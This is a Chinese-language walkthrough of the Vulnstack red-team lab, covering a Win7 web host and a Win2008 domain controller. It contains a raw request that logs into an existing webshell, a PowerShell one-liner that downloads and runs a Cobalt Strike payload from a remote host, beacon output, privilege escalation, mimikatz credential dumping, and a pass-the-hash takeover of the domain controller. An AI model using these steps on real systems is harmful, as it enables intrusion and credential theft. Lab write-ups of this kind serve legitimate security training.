0x00 : 简介
Vulnstack红队评估(五)
此次靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习,此靶场主要用来学习,请大家遵守网络网络安全法。
0x01 : 环境
- 主机信息
PC ~ Win7双网卡
外网:192.168.153.142, 我用的NAT与本机相连, 具体IP自己确定
内网:192.168.138.136
DC ~ Win2008
内网:192.168.138.138
0x02 : 外网
- 外网信息收集
利用nmap扫描WEB开放端口及服务
nmap -F 192.168.153.142
发现开了80和3306端口, 弱口令扫描走一波, 不存在弱口令
利用dirsearch扫目录
http://192.168.153.142/ #ThinkPHP V5
http://192.168.153.142/add.php #已经存在的马
- 外网打点
找个常见后门密码跑一下, 拿到密码admins
POST /add.php HTTP/1.1
Host: 192.168.153.142
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 14
Origin: http://192.168.153.142
Connection: keep-alive
Referer: http://192.168.153.142/add.php
Cookie: new=95
Upgrade-Insecure-Requests: 1
getpwd=admins
sun\administrator
权限, 这个马有点难用, 自己再传一个冰蝎上去
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxx/a'))"
直接上cs
0x03 : 内网
- 主机渗透
收集一下信息
主机名: WIN7
OS 名称: Microsoft Windows 7 专业版
OS 版本: 6.1.7601 Service Pack 1 Build 7601
[01]: KB2534111
[02]: KB2999226
[03]: KB976902
beacon> shell echo %PROCESSOR_ARCHITECTURE%
[*] Tasked beacon to run: echo %PROCESSOR_ARCHITECTURE%
[+] host called home, sent: 60 bytes
[+] received output:
x86
双网卡
beacon> shell ipconfig /all
[*] Tasked beacon to run: ipconfig /all
[+] host called home, sent: 44 bytes
[+] received output:
Windows IP 配置
主机名 . . . . . . . . . . . . . : win7
主 DNS 后缀 . . . . . . . . . . . : sun.com
节点类型 . . . . . . . . . . . . : 混合
IP 路由已启用 . . . . . . . . . . : 否
WINS 代理已启用 . . . . . . . . . : 否
DNS 后缀搜索列表 . . . . . . . . : sun.com
localdomain
以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2
物理地址. . . . . . . . . . . . . : 00-0C-29-FB-41-17
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
本地链接 IPv6 地址. . . . . . . . : fe80::7021:36d:85f6:e57d%16(首选)
IPv4 地址 . . . . . . . . . . . . : 192.168.138.136(首选)
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :
DHCPv6 IAID . . . . . . . . . . . : 352324649
DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-25-F1-93-23-00-0C-29-CE-6E-F7
DNS 服务器 . . . . . . . . . . . : 192.168.138.138
TCPIP 上的 NetBIOS . . . . . . . : 已启用
以太网适配器 Bluetooth 网络连接:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Bluetooth 设备(个人区域网)
物理地址. . . . . . . . . . . . . : F8-63-3F-86-E8-35
DHCP 已启用 . . . . . . . . . . . : 是
自动配置已启用. . . . . . . . . . : 是
以太网适配器 wk1 waiwang:
连接特定的 DNS 后缀 . . . . . . . : localdomain
描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
物理地址. . . . . . . . . . . . . : 00-0C-29-FB-41-0D
DHCP 已启用 . . . . . . . . . . . : 是
自动配置已启用. . . . . . . . . . : 是
本地链接 IPv6 地址. . . . . . . . : fe80::fc0d:3769:9a7d:fcea%11(首选)
IPv4 地址 . . . . . . . . . . . . : 192.168.153.142(首选)
子网掩码 . . . . . . . . . . . . : 255.255.255.0
获得租约的时间 . . . . . . . . . : 2020年8月5日 17:36:03
租约过期的时间 . . . . . . . . . : 2020年8月6日 11:33:46
默认网关. . . . . . . . . . . . . : 192.168.153.2
DHCP 服务器 . . . . . . . . . . . : 192.168.153.254
DHCPv6 IAID . . . . . . . . . . . : 234884137
DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-25-F1-93-23-00-0C-29-CE-6E-F7
DNS 服务器 . . . . . . . . . . . : 192.168.153.2
主 WINS 服务器 . . . . . . . . . : 192.168.153.2
TCPIP 上的 NetBIOS . . . . . . . : 已启用
定位域控IP : 192.168.138.138
beacon> shell ping sun.com
[*] Tasked beacon to run: ping sun.com
[+] host called home, sent: 43 bytes
[+] received output:
正在 Ping sun.com [192.168.138.138] 具有 32 字节的数据:
来自 192.168.138.138 的回复: 字节=32 时间=1ms TTL=128
来自 192.168.138.138 的回复: 字节=32 时间<1ms TTL=128
来自 192.168.138.138 的回复: 字节=32 时间<1ms TTL=128
来自 192.168.138.138 的回复: 字节=32 时间<1ms TTL=128
192.168.138.138 的 Ping 统计信息:
数据包: 已发送 = 4,已接收 = 4,丢失 = 0 (0% 丢失),
往返行程的估计时间(以毫秒为单位):
最短 = 0ms,最长 = 1ms,平均 = 0ms
利用ms14-58
提权
0x03 : 横向渗透
- 横向渗透
信息收集
beacon> net user
[*] Tasked beacon to run net user on localhost
[+] host called home, sent: 87096 bytes
[+] received output:
Users for \\localhost:
Administrator (admin)
Guest
heart (admin)
beacon> net computers
[*] Tasked beacon to run net computers
[+] host called home, sent: 87101 bytes
[+] received output:
Computers:
Server Name IP Address
----------- ----------
DC 192.168.138.138
WIN7 192.168.153.142
抓一下hash
, mimikatz
抓一下明文密码
0x04 : 域控
- 域控
最简单的打域控方法, 利用凭证传递攻击
工具一把梭直接拿下域控
抓hash
和明文密码, 收工
到此本靶场结束
还不快抢沙发